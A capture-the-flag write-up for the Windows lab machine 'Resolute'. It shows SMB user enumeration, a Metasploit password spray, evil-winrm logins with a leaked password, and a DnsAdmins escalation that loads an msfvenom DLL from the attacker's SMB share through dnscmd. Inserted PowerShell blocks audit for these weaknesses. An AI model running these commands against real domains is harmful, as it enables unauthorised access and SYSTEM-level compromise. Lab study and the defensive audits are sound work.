Resolute

Find your way…


Resolute is an easy difficulty machine running Windows. It tests your knowledge of enumeration, which leads to access to the system, and of privilege escalation through exploiting a system service.

Edit: Fixed error stating “It tests your knowledge in OSINT”. This was meant to be enumeration and has been updated accordingly. Don’t copypasta templates without updating them correctly kids! Thanks to plast1k on Reddit for pointing it out.

Be sure to check out the Basic Setup section before you get started.

Enumeration

Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.

Portscan

portscan resolute.htb
Grabbing ports...
Ports grabbed!
Scanning...
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 22:28 PST
Nmap scan report for resolute.htb (10.10.10.169)
Host is up (0.24s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-12-10 06:28:00Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49688/tcp open  msrpc        Microsoft Windows RPC
49821/tcp open  unknown
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h39m17s, deviation: 4h37m08s, median: -43s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2019-12-09T22:30:18-08:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2019-12-10T06:30:22
|_  start_date: 2019-12-10T06:23:37

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 283.53 seconds

A couple of things stand out. WinRM is accessible via port 5985 and we see that the SMB port 445 is also available.

Enum4Linux

Let’s go ahead and enumerate SMB as that can be quite fruitful at times.

enum4linux 10.10.10.169
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Dec  9 22:45:19 2019

 ==========================
|    Target Information    |
 ==========================
Target ........... resolute.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 =============================
|    Users on resolute.htb    |
 =============================
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail      Name: (null)    Desc: (null)
........... Snip ...........
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus       Name: (null)    Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to W....123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie      Name: (null)    Desc: (null)
........... Snip ...........

A lot of detail is output, and we find a bunch of users!

We can see that the account marko has a description that references a password. However, when we check this password against marko's account we find it is invalid.

Thinking about how a company's onboarding process might work, we can infer from the description that when a new staff member's account is created, the default password is potentially the one we found.

Once the new staff member logs in they are probably directed to change their password, which would explain why the password didn't work for marko.

Taking all the users we found we can throw them in a file and check the password against them all:

SMB Login

We can do this using the smb_login module in Metasploit:

msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.169:445      - 10.10.10.169:445 - Starting SMB login bruteforce
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: '.\Administrator:W....123!',
........... Snip ...........
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: '.\claude:W....123!',
[+] 10.10.10.169:445      - 10.10.10.169:445 - Success: '.\melanie:W....123!'
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: '.\zach:W....123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: '.\simon:W....123!',
[-] 10.10.10.169:445      - 10.10.10.169:445 - Failed: '.\naoki:W....123!',
[*] resolute.htb:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We find that the password works with the user melanie.
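Added example, not part of the original write-up: the defender's view of this finding, an audit that flags accounts whose description looks like it holds a credential or whose password has not changed since the account was created, plus the group setting that commonly makes null-session user listing possible. It assumes the RSAT ActiveDirectory module and read access to user attributes; the keyword list and the one-day window are heuristics chosen for the example.

```powershell
# Added example, not from the original write-up. Audits a domain for the weakness
# used above. Assumes the RSAT ActiveDirectory module and read access to user
# attributes; the keyword list and the one-day window are heuristics, not anything
# the machine documents.
Import-Module ActiveDirectory

# Words that tend to sit next to a credential in the description attribute, which
# every authenticated user can read (and anonymous users too, where null sessions
# are allowed, as enum4linux showed here).
$keywords = '(?i)pass(word|wd)?\b|pwd|creden|secret'

$users = Get-ADUser -Filter * -Properties Description, whenCreated, PasswordLastSet

$findings = foreach ($u in $users) {
    $reasons = @()
    if ($u.Description -and $u.Description -match $keywords) {
        $reasons += 'description looks like it contains a credential'
    }
    # Password set when the account was created and never since: still on the
    # onboarding default, which is exactly how melanie's account was opened.
    if ($u.PasswordLastSet -and ($u.PasswordLastSet - $u.whenCreated).TotalDays -lt 1) {
        $reasons += 'password not changed since account creation'
    }
    if ($reasons) {
        [pscustomobject]@{
            Account         = $u.SamAccountName
            Enabled         = $u.Enabled
            PasswordLastSet = $u.PasswordLastSet
            Description     = $u.Description
            Reason          = ($reasons -join '; ')
        }
    }
}
$findings | Sort-Object Account | Format-Table -AutoSize

# Null-session user listing (what enum4linux did here) is commonly possible when
# Anonymous Logon (S-1-5-7) or Everyone (S-1-1-0) has been added to the
# Pre-Windows 2000 Compatible Access group.
$members = (Get-ADGroup -Identity 'Pre-Windows 2000 Compatible Access' -Properties Members).Members
if ($members -match '^CN=S-1-5-7,|^CN=S-1-1-0,') {
    Write-Warning 'Pre-Windows 2000 Compatible Access grants anonymous/everyone read access'
}
```

Accounts that come back with both reasons are the ones a password spray like the one above will hit first.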

User

Let’s go check it out:

evil-winrm -i 10.10.10.169 -u melanie -p W...123!
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
PS C:\Users\melanie\Documents> cat ../Desktop/user.txt
0c3be45fcf....8d3a978540

We get the user flag!

Checking out the user information for melanie we can’t see anything that stands out at us.

Looking for other users we see the user ryan in C:\Users.

Taking a look in the usual directories doesn’t show anything of use.

Since we have access to PowerShell, let's use its "power" to look for any hidden files!

PS C:\Users> Get-ChildItem -Path C:\ -Include *.txt -Hidden -File -Recurse -force -ErrorAction SilentlyContinue


Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt 

Hmm… a PowerShell transcript. This is similar to .bash_history on Linux. The Start-Transcript command records a PowerShell session and outputs it to a file; transcription can also be switched on for every session by Group Policy, which is one way transcripts end up in a central directory like C:\PSTranscripts without the user ever running the command. The transcript includes all commands that the user types and all output that appears on the console.

Nice, let's not waste any time in checking that out then:

PS C:\PSTranscripts\20191203> cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan S....123!

if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************   

Everyone seems to like using 123 in their passwords!

In the file we can see that the transcript is for the user ryan, and we find another password.

Let's try accessing this new account:

evil-winrm -i 10.10.10.169 -u ryan -p S....123!

And we are in.
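Added example, not part of the original write-up: a sweep of a transcript directory for commands that carry a credential on the command line (the `net use ... ryan <password>` shape seen above), followed by a check of who can read the directory, since a transcript is only as private as the folder holding it. The directory path and the pattern list are assumptions; the line formats matched are the ones in the transcript above (the Invoke-Expression binding written by remoting hosts and the prompt line written by interactive consoles).

```powershell
# Added example, not from the original write-up. Sweeps PowerShell transcripts for
# commands that embed a password and reports broad read access on the directory.
# The path and the pattern list are my own assumptions.
$TranscriptRoot = 'C:\PSTranscripts'

# Command shapes that routinely carry a password as a plain argument.
$credPatterns = @(
    '(?i)\bnet\s+use\b',        # net use <share> <user> <password>
    '(?i)/user:',               # runas, net use /user:
    '(?i)-AsPlainText',         # ConvertTo-SecureString ... -AsPlainText
    '(?i)\bcmdkey\b.*/pass'     # cmdkey /pass:
)

$findings = foreach ($f in Get-ChildItem -Path $TranscriptRoot -Filter '*.txt' -Recurse -File -Force -ErrorAction SilentlyContinue) {
    $user = 'unknown'
    foreach ($line in Get-Content -Path $f.FullName -ErrorAction SilentlyContinue) {
        # The header block names the account the session ran as.
        if ($line -match '^Username:\s*(.+)$') { $user = $Matches[1].Trim(); continue }
        $cmd = $null
        if ($line -match 'ParameterBinding\(Invoke-Expression\): name="Command"; value="(.+)$') {
            $cmd = $Matches[1]      # remoting hosts (wsmprovhost.exe) log commands this way
        } elseif ($line -match '^PS [^>]*>\s*(\S.*)$') {
            $cmd = $Matches[1]      # interactive consoles log the prompt line
        }
        if ($cmd -and ($credPatterns | Where-Object { $cmd -match $_ })) {
            [pscustomobject]@{ File = $f.Name; User = $user; Command = $cmd }
        }
    }
}
$findings | Format-Table -AutoSize -Wrap

# Who can read the transcripts? On this box a different low-privileged user could
# read ryan's session, which is the real failure.
(Get-Acl -Path $TranscriptRoot).Access |
    Where-Object { $_.AccessControlType -eq 'Allow' -and
                   $_.IdentityReference -match 'Everyone|\\Users$|Authenticated Users' } |
    ForEach-Object { Write-Warning "$($_.IdentityReference) has $($_.FileSystemRights) on $TranscriptRoot" }
```

The usual fix is a central transcript location that users can write to but not read back from, which this check reports as clean.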

Root

Let's waste no time in checking the user's privileges:

PS C:\Users\ryan\Documents> whoami /all

USER INFORMATION
----------------

User Name     SID                                           
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes                                                     
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group             
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group             
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group             
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group             
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group             
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group             
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192                                                                                                   


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

We see that ryan is a member of the DnsAdmins group. A quick search online shows a way to escalate using the serverlevelplugindll option in dnscmd.exe.

There are two methods of accomplishing this. The first uses an msfvenom payload hosted remotely (to avoid the AV), with Impacket's smbserver.py serving the .dll.

Alternatively, you can create your own .dll to avoid the AV and host it locally (NOTE: it can also be used remotely, but that's no fun!). You can follow this method here.

First we will use msfvenom and Metasploit. Create our payload:

msfvenom -p windows/x64/shell_bind_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f dll > shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 499 bytes
Final size of dll file: 5120 bytes

We then host the .dll via smbserver on the attacker machine:

smbserver.py TMP /root/Shells/share
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed

We then set up our Metasploit handler:

msf5 exploit(multi/handler) > set payload windows/x64/shell_bind_tcp
payload => windows/x64/shell_bind_tcp
msf5 exploit(multi/handler) > set lport 1234
msf5 exploit(multi/handler) > set rhost 10.10.10.169
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/shell/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     1234             yes       The listen port
   RHOST     10.10.10.169     no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) > run

[*] Started bind TCP handler against 10.10.10.169:1234
[*] Sending stage (336 bytes) to 10.10.10.169

On the victim machine we then set our .dll to be loaded when the DNS service is restarted.

We then restart the service:

C:\Users\ryan\Downloads> dnscmd /config /serverlevelplugindll \\10.10.14.40\TMP\shell.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.

PS C:\Users\ryan\Downloads> sc.exe stop dns

SERVICE_NAME: dns 
        TYPE               : 10  WIN32_OWN_PROCESS  
        STATE              : 3  STOP_PENDING 
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x1
        WAIT_HINT          : 0x7530
PS C:\Users\ryan\Downloads> sc.exe start dns

SERVICE_NAME: dns 
        TYPE               : 10  WIN32_OWN_PROCESS  
        STATE              : 2  START_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 2756
        FLAGS              : 

You will see in the smbserver output that resolute executes the .dll:

[*] Incoming connection (10.10.10.169,52935)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:4141414141414141:398df5875fb62f7ce834603948ffcdaa:01010000000000008053f8ccb7afd501e85de9fe88e966db00000000010010004600590057006900770069007400460002001000700073004a0055006900480046004300030010004600590057006900770069007400460004001000700073004a0055006900480046004300070008008053f8ccb7afd501060004000200000008003000300000000000000000000000004000009be720f2b9f3b0f3138acd75092b55330464bd29d76a96706e41aceb9c94d64d0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00340030000000000000000000

You should then see a session open with your metasploit handler:

[*] Command shell session 1 opened (10.10.14.40:40671 -> 10.10.10.169:1234) at 2019-12-10 16:18:37 -0800
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
e1d94876a5....b5405e619c

Congrats! We have our root flag :)
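Added example, not part of the original write-up: the audit a defender would run on the DNS server/DC for the conditions this escalation depends on, namely who sits in DnsAdmins, whether a ServerLevelPluginDll value is registered and where it points, and recent DNS service restarts. It assumes the RSAT ActiveDirectory module and local rights to read the DNS service's registry parameters; the registry value is the one dnscmd /config writes.

```powershell
# Added example, not from the original write-up. Run on the DNS server itself.
# Assumes the RSAT ActiveDirectory module and rights to read the registry.
Import-Module ActiveDirectory

# 1. DnsAdmins can point dns.exe (which runs as SYSTEM) at any DLL, so treat the
#    group as Tier 0 and review every member, nested ones included.
Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
    Select-Object objectClass, SamAccountName, distinguishedName |
    Format-Table -AutoSize

# 2. Is a plugin DLL registered, and from where would it load?
$regPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
$plugin  = (Get-ItemProperty -Path $regPath -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll

if (-not $plugin) {
    Write-Output 'OK: ServerLevelPluginDll is not set'
} elseif ($plugin -like '\\*') {
    # The UNC case above: the DLL is fetched over SMB as the machine account.
    Write-Warning "ServerLevelPluginDll is a UNC path: $plugin"
} elseif ($plugin -notlike "$env:SystemRoot\System32\*") {
    Write-Warning "ServerLevelPluginDll is outside System32: $plugin"
} else {
    Write-Output "INFO: ServerLevelPluginDll = $plugin (verify signature and file owner)"
}

# 3. A restart of the DNS service is what triggers the load. System event 7036
#    records service state changes; pair it with Sysmon event 13 (registry value
#    set) on the value above for an alert rather than an after-the-fact check.
Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7036 } -MaxEvents 200 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'DNS Server' } |
    Select-Object TimeCreated, Message |
    Format-Table -AutoSize -Wrap
```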

Conclusion

This machine was pretty fun. I liked the fact that the privilege escalation to root used a system service capability that Microsoft deems a "feature". In a real-world scenario it is common for multiple people to have access to group privileges relating to system services, so this machine's scenario isn't that far out of the realms of possibility.
